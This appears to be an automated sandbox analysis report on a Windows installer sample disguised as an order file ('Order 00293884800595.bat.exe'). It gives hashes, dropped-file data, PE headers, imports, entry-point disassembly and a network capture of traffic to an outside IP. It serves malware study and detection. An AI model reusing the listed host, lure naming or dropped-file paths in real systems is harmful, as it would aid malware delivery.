SHA1:	808A634035F94A20441F52F413777897DFD7D3E0
SHA-256:	CA6742E9E11A6E3008BAE84674451A7228E0E79F53A34235269984EFAE996C72
SHA-512:	6D4114A7DCF410C531465AEE6802A3A0A965864DD4AE65E304188931D17C394B3A700DA6558CCB2BF37AA99906D34A1E38E7CF62E655A6E2EAC3E5CDC38449E9
Malicious:	false
Preview:	......G.[..........Wd......^..................;{..+........o..a.....g..2......BN...........m`..{...g..k..(..........Z.s...Z....\|.`.$....u..m..@.b.h.........n[.q...!.....(B.C..........4KC..................v.......[.q.i.......ug...g...E.....A..[..o38..........N.^.......y.p.z....._.!..........<.,..I.Y..G................._....;\.&........\.....bu..>...........=...r..y...}....`\|7.......w...2...........od.C.......................... ....................ul._9.4<...~..........................e]...+.....i.......... _....................l...........z.u..2f...4...$.Pg................J............h...D.......R.3..........G!..w.r."..........{.JS8........O.P....m...'.......rS..........1..2....0.......+....M...0.....Y...:.........Q....g.l.q......'.r$..........7............6.........o..2..5...........%.0...:.........G......................\|............._...8.P...................\|.......r...........M.......6~...B...g.d.........5....'...................3....Y...}.4L.DT,.....R..Ds....7.........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\hmoriderne.ner

Download File

Process:	C:\Users\user\Desktop\Order 00293884800595.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	1618
Entropy (8bit):	4.660461986408
Encrypted:	false
SSDEEP:	48:mV2wmwMfFEXBaoCpI1sCEVHQTtlgJtScnbhH7D:maNK/0IOQjgJhx
MD5:	5A5EB5C7789F88A3DCC3F79DB0AA1A49
SHA1:	E67C28DEF4C59F267095C50C6A571AB5B65A9D04
SHA-256:	3A7318B3E11D39D783BA8BCCCAD3541B6896A03B1533E4F189DFD1CCC2FF40CE
SHA-512:	9762CD2524E971CF672D8DD8F46F4E7EE3F0FF5D91D11801AECB135DF9FBA6FC93D5FCC131879C1D3A81F2734AC5D6E07016E6CEC131A5F51C54CFE0664D0238
Malicious:	false
Preview:	...b..>.P.....k.................`T...........-.8...$....#P...f..9%......Y.9....o............C...#...............O\|......9......u.............e......D=.A...............x...c....5^..?....G..h.....'..........k....../............Bn........i........&..............5Q..4........@..C......7.;....t....5...............C..x..................H...@.....>.......9.h..c......3..9W..$......v.....~.........!.......Y...."X.....N..\|......d....Z.[.......+j.....@xB..w..S.........N.............J......u...................n....x....'..R.n.;...=.H`............................3...c.e..F..C.....n.0n..).......Y...Z..0..I.Q...Y.......H-...W..Q......<.`......l.........".S...Mg.8...X.........0/........[..$.........R...p.k-......S....`.....................k.....@......L.8.$....\M..............>.l.................d...O............R....+.................g..x.....>..b......V-..w...../...8......G......Q..........}..G..............'....................v.......m.}:...I$...........".M...J........._*..{...........

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.446136838270128
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Order 00293884800595.bat.exe
File size:	507'437 bytes
MD5:	efd3bf2442d368363512548564a51050
SHA1:	ca5a3f2750542ea7d6b86f108eb6bff4095f4b16
SHA256:	f321c2bed7f29e767bbbf1fb11f6fd64e41e5fe45b3fef084198583a20f9533b
SHA512:	c26bea56fd64182ecfb9c2d3968d8c2e9cf8066a421606cda53ab3684d5564fb9e5f4496ca61c8b2c97fa5e52a81753481a40dddbe7115ba5ec96c580e035dcc
SSDEEP:	12288:c19+dlfwYKZWegvXQto36lPXgPQxJ31hRW/UiPk:PdloYK7gvAS3QGQ31hRNV
TLSH:	E5B4CF53F72388DBDA3D13F199A2C7772EE410199971D5DDA3E2BE8770009263A193B8
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.w.F......F...v...F...@...F.Rich..F.........PE..L....C.f.................h...x.......3............@

File Icon


Icon Hash:	eb9b9b2bbb9be371

Static PE Info

General

Entrypoint:	0x4033d8
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x660843F9 [Sat Mar 30 16:55:21 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	671f2a1f8aee14d336bab98fea93d734

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 00000224h
push esi
push edi
xor edi, edi
push 00008001h
mov dword ptr [ebp-14h], edi
mov dword ptr [ebp-0Ch], 0040A188h
mov dword ptr [ebp-08h], edi
mov byte ptr [ebp-04h], 00000020h
call dword ptr [0040809Ch]
mov esi, dword ptr [004080A0h]
lea eax, dword ptr [ebp-000000C4h]
push eax
mov dword ptr [ebp-000000B0h], edi
mov dword ptr [ebp-30h], edi
mov dword ptr [ebp-2Ch], edi
mov dword ptr [ebp-000000C4h], 0000009Ch
call esi
test eax, eax
jne 00007F519CB7FE11h
lea eax, dword ptr [ebp-000000C4h]
mov dword ptr [ebp-000000C4h], 00000094h
push eax
call esi
cmp dword ptr [ebp-000000B4h], 02h
jne 00007F519CB7FDFCh
movsx cx, byte ptr [ebp-000000A3h]
mov al, byte ptr [ebp-000000B0h]
sub ecx, 30h
sub al, 53h
mov byte ptr [ebp-2Ah], 00000004h
neg al
sbb eax, eax
not eax
and eax, ecx
mov word ptr [ebp-30h], ax
cmp dword ptr [ebp-000000B4h], 02h
jnc 00007F519CB7FDF4h
and byte ptr [ebp-2Ah], 00000000h
cmp byte ptr [ebp-000000AFh], 00000041h
jl 00007F519CB7FDE3h
movsx ax, byte ptr [ebp-000000AFh]
sub eax, 40h
mov word ptr [ebp-30h], ax
jmp 00007F519CB7FDD6h
mov word ptr [ebp-30h], di
cmp dword ptr [ebp-000000C0h], 0Ah
jnc 00007F519CB7FDDAh
and word ptr [ebp+00000000h], 0000h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x853c	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x43000	0x33c30	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x294	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x660c	0x6800	3b90adcd2f1248db844446cb2ef15486	False	0.6663912259615384	data	6.411908920093797	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1340	0x1400	b3bd9ad1bd1020c5cf4d51a4d7b61e07	False	0.4576171875	data	5.237673976044139	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x25138	0x600	c4e774255fea540ed5efa114edfa6420	False	0.4635416666666667	data	4.1635686587741	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x30000	0x13000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x43000	0x33c30	0x33e00	7fa7729fe4a0557bfedd7b90570ef402	False	0.497632718373494	data	6.34541536700329	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x43388	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536	English	United States	0.30904708387554714
RT_ICON	0x53bb0	0xb761	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9867930557034827
RT_ICON	0x5f318	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 36864	English	United States	0.3459112886272861
RT_ICON	0x687c0	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 20736	English	United States	0.391913123844732
RT_ICON	0x6dc48	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384	English	United States	0.4092465753424658
RT_ICON	0x71e70	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	English	United States	0.4437759336099585
RT_ICON	0x74418	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	English	United States	0.5302532833020638
RT_ICON	0x754c0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	English	United States	0.6196721311475409
RT_ICON	0x75e48	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	English	United States	0.6524822695035462
RT_DIALOG	0x762b0	0x100	data	English	United States	0.5234375
RT_DIALOG	0x763b0	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x764d0	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x76598	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x765f8	0x84	data	English	United States	0.9242424242424242
RT_VERSION	0x76680	0x270	data	English	United States	0.5016025641025641
RT_MANIFEST	0x768f0	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
ADVAPI32.dll	RegEnumValueA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, RegOpenKeyExA, RegCreateKeyExA
SHELL32.dll	SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteExA
ole32.dll	OleUninitialize, OleInitialize, IIDFromString, CoCreateInstance, CoTaskMemFree
COMCTL32.dll	ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll	SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcA, GetMessagePos, CheckDlgButton, LoadCursorA, SetCursor, GetSysColor, SetWindowPos, GetWindowLongA, IsWindowEnabled, SetClassLongA, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetDlgItemTextA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, MessageBoxIndirectA, CharPrevA, PeekMessageA, GetClassInfoA, DispatchMessageA, TrackPopupMenu
GDI32.dll	GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor
KERNEL32.dll	CreateFileA, GetTempFileNameA, ReadFile, RemoveDirectoryA, CreateProcessA, CreateDirectoryA, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceA, lstrcpynA, SetErrorMode, GetVersionExA, lstrlenA, GetCommandLineA, GetTempPathA, GetWindowsDirectoryA, WriteFile, ExitProcess, CopyFileA, GetCurrentProcess, GetModuleFileNameA, GetFileSize, GetTickCount, Sleep, SetFileAttributesA, GetFileAttributesA, SetCurrentDirectoryA, MoveFileA, GetFullPathNameA, GetShortPathNameA, SearchPathA, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, GetModuleHandleA, LoadLibraryExA, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv, lstrcpyA, MoveFileExA, lstrcatA, WideCharToMultiByte, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 1, 2024 12:10:21.185802937 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:21.427234888 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:21.427412033 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:21.427661896 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:21.670203924 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:21.670219898 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:21.670248032 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:21.670382977 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:21.670494080 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:21.670589924 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:21.911412001 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:21.911449909 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:21.911561012 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:21.911597013 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:21.911629915 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:21.911633015 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:21.911660910 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:21.911679029 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:21.911681890 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:21.911706924 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:21.911808968 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:21.911808968 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:21.911900043 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.154953003 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.155049086 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.155062914 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.155075073 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.155173063 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.155179024 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.155195951 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.155208111 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.155250072 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.155342102 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.155395985 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.155411005 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.155426025 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.155431986 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.155442953 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.155471087 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.155495882 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.155507088 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.155519009 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.155523062 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.155612946 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.155771017 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.398586988 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.398602962 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.398694992 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.398710012 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.398720980 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.398787975 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.398823977 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.398847103 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.398858070 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.398861885 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.398875952 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.398899078 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.398910999 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.398921967 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.398938894 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.398966074 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.399008989 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.399018049 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.399065018 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.399076939 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.399089098 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.399178982 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.399214029 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.399267912 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.399302959 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.399327040 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.399339914 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.399353027 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.399364948 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.399379969 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.399389029 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.399445057 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.399446011 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.399461985 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.399475098 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.399513006 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.399563074 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.399627924 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.399635077 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.399718046 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.399821997 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.639377117 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.639497995 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.639542103 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.639576912 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.639662981 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.639702082 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.639739990 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.639761925 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.639810085 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.639838934 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.639911890 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.639918089 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.639987946 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.639996052 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.640064001 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.640074015 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.640121937 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.640238047 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.640266895 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.640316010 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.640343904 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.640408039 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.640431881 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.640487909 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.640503883 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.640609980 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.640619040 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.640681028 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.640696049 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.640784025 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.640825033 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.640868902 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.640902042 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.640944958 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.640968084 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.641022921 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.641058922 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.641119003 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.641149044 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.641190052 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.641239882 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.641271114 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.641315937 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.641355038 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.641395092 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.641396046 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.641447067 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.641474962 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.641496897 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.641541004 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.641565084 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.641590118 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.641614914 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.641657114 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.641683102 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.641724110 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.641766071 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.641788960 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.641817093 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.641854048 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.641863108 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.641911983 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.641952038 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.641990900 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.642007113 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.642044067 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.642071962 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.642095089 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.642139912 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.642163992 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.642188072 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.642215014 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.642241955 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.642287970 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.642306089 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.642340899 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.642383099 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.642422915 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.642436981 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.642477036 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.642488956 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.642533064 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.642566919 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.642580032 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.642630100 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.642644882 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.642683983 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.642745018 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.642793894 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.642802954 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.642852068 CEST	80	54357	109.248.151.29	192.168.11.30
Jul 1, 2024 12:10:22.642919064 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.642971039 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.643019915 CEST	54357	80	192.168.11.30	109.248.151.29
Jul 1, 2024 12:10:22.883238077 CEST	80	54357	109.248.151.29	192.168.11.30
